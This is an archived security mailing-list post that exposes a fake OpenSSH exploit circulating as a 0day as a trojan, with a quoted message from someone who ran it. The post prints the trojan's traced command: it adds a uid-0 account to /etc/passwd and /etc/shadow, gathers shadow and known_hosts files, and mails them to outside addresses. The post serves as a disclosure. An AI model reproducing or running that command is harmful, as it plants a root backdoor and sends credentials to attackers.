lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <3F6B990D.50108@snosoft.com>
From: dotslash at snosoft.com (KF)
Subject: new openssh exploit in the wild! * is FAKE
 AS SH@!*

printf("[*] sending shellcode\n")= 22
popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
"sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
/etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
  find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp |
/usr/sbin/sendmail -f ownage@....de
m0nkeyhack@...ermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
0x0804a6b0


-KF


gordon last wrote:
> hi readers,
> while i was staying idle in an so called 0day release channel on one irc 
> network some scriptkiddies were
> talking about an new 0day release.
> 
> in my backlog i can see the following:
> ---cut
> 08:09 [R4lph] *** r3t0r (r4lph@xxx) has joined channel #0dayz
> 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/
> ---cut
> 
> i looked at this piece of exploit... it is binary so i'am not sure if 
> this is a trojan or a backdoor or a virus. but i can't see anything 
> strange while sniffing the exploit traffic. and i got root on serveral 
> of my openbsd boxes with that. the bruteforcer seems to be very good.
> 
> i too looked at "strings theosshucksass" and found nothing suspicious.
> 
> this exploit seems to be in the wild (underground) since beginning of 
> august.
> 
> thats quite a long time i hope most admins are patching the systems 
> now... because the exploit is getting round faster and faster.
> 
> if anyone can reverse engineer this piece it would be great if he posts 
> his resulsts on his list because iam really intressted on the exploiting 
> technique used for that bug.
> 
> i cant get an idea on how to exploit this.
> 
> hmm...
> regards,
> glast
> 
> ------------------------------------------------------------------------
> Ab sofort auch im Ortsbereich einfach die 0-10-13 vorw?hlen. Infos unter 
> www.tele2.de ? <http://www.tele2.de>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ